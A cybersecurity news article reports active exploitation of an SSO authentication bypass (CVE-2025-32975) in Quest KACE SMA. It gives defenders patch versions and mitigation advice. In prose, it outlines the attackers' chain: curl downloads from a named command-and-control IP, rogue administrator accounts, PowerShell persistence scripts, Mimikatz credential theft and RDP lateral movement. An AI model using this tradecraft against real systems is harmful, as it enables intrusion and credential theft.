Hackers Exploit Quest KACE SMA Flaw to Steal Credentials

Hackers are actively exploiting a critical vulnerability in Quest KACE Systems Management Appliance (SMA) to gain unauthorized access, harvest credentials, and move laterally across enterprise networks, according to new findings from security researchers.

The flaw, tracked as CVE-2025-32975, affects the appliance’s Single Sign-On (SSO) authentication mechanism and allows attackers to bypass authentication entirely.

This enables threat actors to impersonate legitimate users without needing valid login credentials, effectively granting full administrative control over vulnerable systems.

Quest KACE SMA is widely used by organizations for centralized endpoint management, including software deployment, patching, and device monitoring.

Its deep integration into enterprise environments makes it a high-value target for attackers.

Although a patch for the vulnerability was released in May 2025, many organizations have failed to update their systems.

As a result, unpatched and internet-exposed appliances are now being actively targeted in the wild. Researchers observed exploitation activity beginning the week of March 9, 2026.

Security researchers at Arctic Wolf discovered that once attackers gain initial access through the authentication bypass, they quickly establish persistence within the compromised environment.

They leverage the built-in KPluginRunProcess feature to execute remote commands, often using Base64-encoded payloads to evade detection.

In observed attacks, threat actors used simple curl commands to download additional malicious payloads from an external command-and-control server hosted at IP address 216.126.225.156.

This indicates a straightforward yet effective method of staging further compromise.

To maintain persistence, attackers abuse legitimate system processes such as runkbot.exe to create unauthorized administrative accounts.

These rogue accounts are then added to local and domain administrator groups, ensuring continued access even if the original entry point is detected.

The attackers also deploy stealthy PowerShell scripts, including files like Enable-UpdateServices.ps1 and taskband.ps1, which modify registry settings and establish long-term backdoor access.

These changes allow the malicious presence to survive system reboots and routine maintenance operations.

After securing persistence, the focus shifts to credential harvesting and internal reconnaissance. Attackers deploy Mimikatz, sometimes disguised as benign executables like asd.exe, to extract plaintext credentials directly from system memory.

Using these credentials, they map the network environment and identify high-value targets.

Researchers observed lateral movement via Remote Desktop Protocol (RDP), with attackers gaining access to critical infrastructure such as domain controllers and enterprise backup systems, including those running Veeam and Veritas software.

This level of access significantly increases the risk of widespread compromise, data theft, or even ransomware deployment.

Security experts strongly urge organizations to immediately patch affected systems. Users running older versions, including 13.0, 13.1, and 13.2, should upgrade to versions 13.0.385, 13.1.81, and 13.2.183 or later.

For newer deployments, version 14.0 requires Patch 5 (14.0.341), while version 14.1 requires Patch 4 (14.1.101).

In addition to patching, organizations should remove KACE SMA interfaces from public internet exposure.

Restricting access through VPNs or secure network boundaries can significantly reduce the attack surface and prevent unauthorized exploitation.

The ongoing campaign highlights the persistent risk posed by unpatched systems and the speed at which attackers weaponize known vulnerabilities to infiltrate enterprise environments.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google

The post Hackers Exploit Quest KACE SMA Flaw to Steal Credentials appeared first on Cyber Security News.